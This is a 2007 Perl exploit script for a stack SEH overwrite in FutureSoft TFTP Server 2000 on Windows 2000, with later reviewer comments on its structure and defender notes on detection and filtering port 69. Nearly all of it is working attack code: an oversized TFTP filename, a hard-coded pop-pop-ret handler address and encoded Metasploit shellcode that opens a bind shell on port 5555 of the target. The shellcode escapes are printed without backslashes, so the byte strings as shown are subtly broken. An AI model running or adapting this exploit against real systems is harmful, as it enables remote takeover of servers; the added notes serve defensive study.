Posted on 24 March 2007
#!/usr/bin/perl
# ===============================================================================================
# FutureSoft TFTP Server 2000 Remote SEH Overwrite Exploit
# By Umesh Wanve
# ===============================================================================================
#
# Date : 22-03-2007
#
# Tested on Windows 2000 SP4 Server English
#           Windows 2000 SP4 Professional English
#
# You can replace shellcode with your favourite one :)
#
#
# Stack ---> buffer              === AAAAA.........
#            |
#            Pointer to next SEH === Short Jump to Hellcode
#            |
#            SEH Handler         === Pop, Pop, Ret (ws2help.dll win2000 sp4)
#            |
#            NOP Sled            === Nop Sled
#            |
#            Hellcode            === Hell.........
#
# This exploit will open port 5555 on remote server. Connect it to open shell.
#
#
# P.S: This was written for educational purpose. Use it at your own risk.Author will be not be
#      responsible for any damage.
#
# Always Thanks to Metasploit.
#
#==================================================================================================
#
# Reviewer summary (what the code below actually does):
#   The script sends a single UDP datagram to port 69 (TFTP) of the host named in
#   $ARGV[0]. The datagram is laid out as a TFTP request: a two-byte opcode field,
#   a "filename" field made of 268 'A' bytes followed by the SEH records and the
#   payload, and a trailing NUL-terminated transfer-mode string (the author's comment
#   names it netascii). No reply is read; the script sleeps one second and closes.
#
# Defender notes:
#   * Detection: a TFTP read/write request whose filename field is hundreds of bytes
#     long is far outside normal use and is a strong network-level indicator for
#     this class of attack; the header above also states that the payload opens a
#     listener on port 5555, so a new listening socket appearing on a TFTP server
#     host immediately after such a request is a host-level indicator.
#   * Mitigation: TFTP carries no authentication, so a TFTP service should never be
#     reachable from untrusted networks; filter port 69 at the perimeter and retire
#     unsupported server software.
#
use IO::Socket;
#use strict;
# NOTE(review): strict is commented out and warnings are never enabled, so $socket
# (assigned in the `if` below without `my`) is an undeclared package global.

my($read_request)="x00x01"; # GET or PUT request   (TFTP opcode field, two bytes)
my($tailer)="x00x6ex65x74x61x73x63x69x69x00"; #transporting mode (eg. netascii)
# NUL terminator for the filename field, the mode string, then its NUL terminator.

# win32_bind - EXITFUNC=seh LPORT=5555 Size=344 Encoder=Pex http://metasploit.com
# Opaque encoded payload bytes as published; only the author's framing comments
# (padding / NOP bytes at either end) describe their structure.
my($shellcode)=
"x90x90x90x90". #padding
"x33xc9x83xe9xb0xe8xffxffxffxffxc0x5ex81x76x0ex60".
"x5fx45x77x83xeexfcxe2xf4x9cx35xaex3ax88xa6xbax88".
"x9fx3fxcex1bx44x7bxcex32x5cxd4x39x72x18x5exaaxfc".
"x2fx47xcex28x40x5exaex3exebx6bxcex76x8ex6ex85xee".
"xccxdbx85x03x67x9ex8fx7ax61x9dxaex83x5bx0bx61x5f".
"x15xbaxcex28x44x5exaex11xebx53x0exfcx3fx43x44x9c".
"x63x73xcexfex0cx7bx59x16xa3x6ex9ex13xebx1cx75xfc".
"x20x53xcex07x7cxf2xcex37x68x01x2dxf9x2ex51xa9x27".
"x9fx89x23x24x06x37x76x45x08x28x36x45x3fx0bxbaxa7".
"x08x94xa8x8bx5bx0fxbaxa1x3fxd6xa0x11xe1xb2x4dx75".
"x35x35x47x88xb0x37x9cx7ex95xf2x12x88xb6x0cx16x24".
"x33x0cx06x24x23x0cxbaxa7x06x37x50xc4x06x0cxccx96".
"xf5x37xe1x6dx10x98x12x88xb6x35x55x26x35xa0x95x1f".
"xc4xf2x6bx9ex37xa0x93x24x35xa0x95x1fx85x16xc3x3e".
"x37xa0x93x27x34x0bx10x88xb0xccx2dx90x19x99x3cx20".
"x9fx89x10x88xb0x39x2fx13x06x37x26x1axe9xbax2fx27".
"x39x76x89xfex87x35x01xfex82x6ex85x84xcaxa1x07x5a".
"x9ex1dx69xe4xedx25x7dxdcxcbxf4x2dx05x9execx53x88".
"x15x1bxbaxa1x3bx08x17x26x31x0ex2fx76x31x0ex10x26".
"x9fx8fx2dxdaxb9x5ax8bx24x9fx89x2fx88x9fx68xbaxa7".
"xebx08xb9xf4xa4x3bxbaxa1x32xa0x95x1fx90xd5x41x28".
"x33xa0x93x88xb0x5fx45x77".
"x90x90x90x90". #padding
"x90x90x90x90";

my($pointer_to_next_seh)="xebx06x90x90"; #short jump to shellcode
my($seh_handler)="xa9x11x02x75"; #pop, pop, ret
#(ws2help.dll win2000 sp4)
# The handler address is hard-coded for one DLL build on one OS/service-pack
# combination (see "Tested on" above); it is what ties the listing to that target.

#Building malicious buffer
# Layout: opcode | 268 filler bytes | next-SEH | handler | payload | NUL "mode" NUL.
my($buffer)=$read_request.("A" x 268).$pointer_to_next_seh.$seh_handler.$shellcode.$tailer;

# $ARGV[0] is used without any validation or usage message; with no argument the
# else-branch message interpolates an empty host name.
# NOTE(review): for a UDP socket, a successful new() only means the local socket
# was created and the peer name resolved; it does not show that anything is
# listening on port 69.
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "69", Proto => "UDP"))
{
# All five status lines are printed before the datagram is sent, and nothing is
# ever read back, so "Successfull" is not a verified result; the script cannot
# tell whether the request reached the server or had any effect.
print "++Building Packet...... " ;
print "++Connecting to server..... ";
print "++Sending Buffer .... ";
print "++Exploit Successfull... ";
print "++Connect to victim on 5555..... ";
# request + file name + mode
#see tftp protocol
print $socket $buffer;
sleep(1);    # presumably gives the datagram time to leave before close — no other purpose visible
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:69 ";
}
# __END_CODE